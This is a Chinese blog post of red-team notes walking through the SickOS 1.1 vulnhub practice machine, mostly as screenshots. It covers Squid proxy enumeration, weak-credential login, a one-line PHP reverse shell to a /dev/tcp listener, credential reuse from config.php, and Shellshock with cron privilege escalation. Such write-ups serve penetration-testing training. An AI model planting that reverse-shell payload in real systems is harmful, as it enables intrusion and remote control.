第三篇红队笔记-百靶精讲之SickOS

最新推荐文章于 2025-12-03 12:42:20 发布
原创 最新推荐文章于 2025-12-03 12:42:20 发布 · 338 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

方法1

开始

主机发现

在这里插入图片描述

nmap扫描及思路分析

在这里插入图片描述

Squid代理分析与设置

  • 直接访问失败,结合nmap的-sV版本探索,得出应该是代理服务器(百度Squid 3128 确实是代理服务器)
    在这里插入图片描述

Web渗透

  • 目录遍历
    在这里插入图片描述

    在这里插入图片描述
  • 可以账号爆破,得admin admin账号密码
    在这里插入图片描述

获得系统初始Shell

  • 反弹shell
    在这里插入图片描述
    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.30/7777 0>&1'");?>
    在这里插入图片描述

提权到SickOS账户

  • mysql配置文件config.php
    在这里插入图片描述
  • 尝试mysql用户密码 sickos john@123
    在这里插入图片描述

进一步提权

在这里插入图片描述

rooted

在这里插入图片描述

方法2

Nikto扫描

在这里插入图片描述

Shellshock漏洞原理

Shellshock验证

在这里插入图片描述

Shellshock获取初始系统shell

在这里插入图片描述
在这里插入图片描述

  • python -c “import pty;pty.spawn(‘/bin/bash’)”
    在这里插入图片描述

Cron自动任务提权

在这里插入图片描述

rooted

在这里插入图片描述

zgcadmin
关注
红队笔记3-SickOS1.1打流程解法1-穿越Squid代理的CMS渗透(vulnhub)
qq_63442530的博客
03-15 1520
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代码执行和文件上传的位置,构造反弹命令写入代码执行,反弹shell。
红队笔记精讲SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1609
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。精讲SickOS1.1,vulnhub机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
红队笔记精讲SickOS1.1 - Shellshock原理和利用过程精讲
m0_73612768的博客
11-29 1188
本文是作者在观看B站《红队笔记》后做的一些笔记及相关知识补充
红队笔记5-Prime1打流程-模糊测试+内核提权(vulnhub)
qq_63442530的博客
03-18 1310
学习的视频是哔哩哔哩红队笔记:「红队笔记精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!_哔哩哔哩_bilibili打时参考文章和本文借鉴文章:红队打:Prime1详细打思路之模糊测试+内核提权(vulnhub)_prime1-优快云博客机下载链接见:https://download.vulnhub.com/sickos/sick0s1.1.7zSudo nmap -sn 192.168.254.0/24目标主机ip:192.254.168.1441.快速扫描发现存活
红队笔记4-SickOS1.1打流程解法2-nikto漏扫 shellshock漏洞利用(vulnhub)
qq_63442530的博客
03-16 1312
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。其中cgi-bin目录可能存在漏洞,使用nikto漏扫工具,发现shellshock漏洞3.漏洞利用:用msfvenom生成反弹shell的payload,成功获得初始立足点www-data的shell。
红队打SickOS1.1详细打思路(vulnhub)
Bossfrank的博客
06-07 3374
本文是vulnhubsickos详细打过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
红队打SickOS1.1详细打思路之shellshock漏洞利用(vulnhub)
Bossfrank的博客
06-08 1453
本文详述了vulnhubsickOS1.1的打过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
红队打:Prime1详细打思路之模糊测试+内核提权(vulnhub)
Bossfrank的博客
06-11 3712
本篇博客详述了vulnhub机prime1的打思路过程,并非简单复现writeup。打过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
红队打:pWnOS1.0打思路详解之ssh私钥破解+shellshock漏洞提权
Bossfrank的博客
07-01 1786
本文详述了vulnhub机pWnOS1.0的详细打的第二种方法。打过程涉及到关于webmin任意文件泄露、ssh私钥碰撞、shellshock漏洞提权等。自己动手才发现问题很多,这个机的知识点还是很丰富。
第十一篇红队笔记-精讲之Brainpan1-缓存区溢出
admin741admin的博客
06-08 1085
对照的就是pattern_create.rb生成的1000字符中524位的地方存在溢出,pattern_offset.rb会自动计算在1000个字符中4Ar5位置。一般将工具 msf-pattern_create和 msf-pattern_offset配合使用。所以我们要通过在eip这四个字节里面写上esp的地址。msf-pattern_create生成上述溢出大小不会超过1k的长度字符串。esp它的确是eip结束之后去执行的,但是它具体在哪个位置上不清楚.根据可用dll,搜索jmp esp 地址。
第四篇红队笔记-精讲之Prime-wfuzz-wpscan-openssl enc
admin741admin的博客
06-08 1196
我执行的结果是:failed to load prog ‘Permission denied’。不确定是否ubuntu版本问题。
第十篇红队笔记-精讲之Tr0ll-FTP-wireshark(pcap)
admin741admin的博客
06-08 249
Crackmapexec密码喷射破解-成功-需要偶然打乱用户表行。Crackmapexec密码喷射破解-失败。
第七篇红队笔记-精讲之pWnOS1.0-Authorized_keys-prng-shellshock
admin741admin的博客
06-08 586
home/vmware/.ssh/authorized_keys 是各个公钥存放的路径比如本地window 想免密码直接ssh连接linux,window先本地生成id_rsa私钥和id_rea.pub公钥通过类似scp工具把id_rea.pub公钥上传目标linux的.ssh/authorized_keys目录。
第十四篇红队笔记-精讲之BNE0x03Simple
admin741admin的博客
06-08 223
内核提权失败的时候,可以考虑下Apport。
网络安全防护指南:筑牢网络安全防线(510)
2509_94105975的博客
12-01 769
网络是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息收集、存储、传输、交换、处理的系统。在当今数字化时代,网络已经成为人们生活和工作中不可或缺的一部分。它连接了世界各地的人们,使得信息的传递和交流变得更加便捷高效。
什么是网络安全?网络安全包括哪几个方面?学完能做一名黑客吗?
最新发布
weixin_57514792的博客
12-03 1327
什么是网络安全?网络安全包括哪几个方面?学完能做一名黑客吗?
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1687
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
企业级Web安全加速方案:一体化防护DDoS/CC/爬虫攻击
2201_76066823的博客
12-02 375
针对DDoS、CC攻击及恶意爬虫的一体化防护方案需整合多层防御策略,结合流量清洗、行为分析、智能验证等技术,确保业务高可用性与数据安全
中科大计算机网络——网络安全
Tandy12356_的博客
12-01 389
使用checksum作为H不合适,因为很容易反向计算出m'与m有同样的报文摘要。为何不能让你逆向推导出报文m?防止你用不合法的协议m'在法庭上要挟签名人。使用公开密钥加密体系作认证的缺陷:中间人攻击。本质原因:Bob没有拿到真正Alice的公钥。解决方案:让Bob可靠地拿到Alice的公钥。只要根是可靠的,后面大概率也是可靠的。求幂次方和求模运算代价非常大。
Awesome-CobaltStrike资源汇总:红队安全工具
3. 横向移动:Cobalt Strike支持横向移动功能,模拟攻击者在受感染的网络内部移动的过程,有助于测试网络的安全性。 4. 数据搜集:Cobalt Strike可以搜集目标系统的信息,包括敏感数据和系统配置信息等。 5. 报告...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值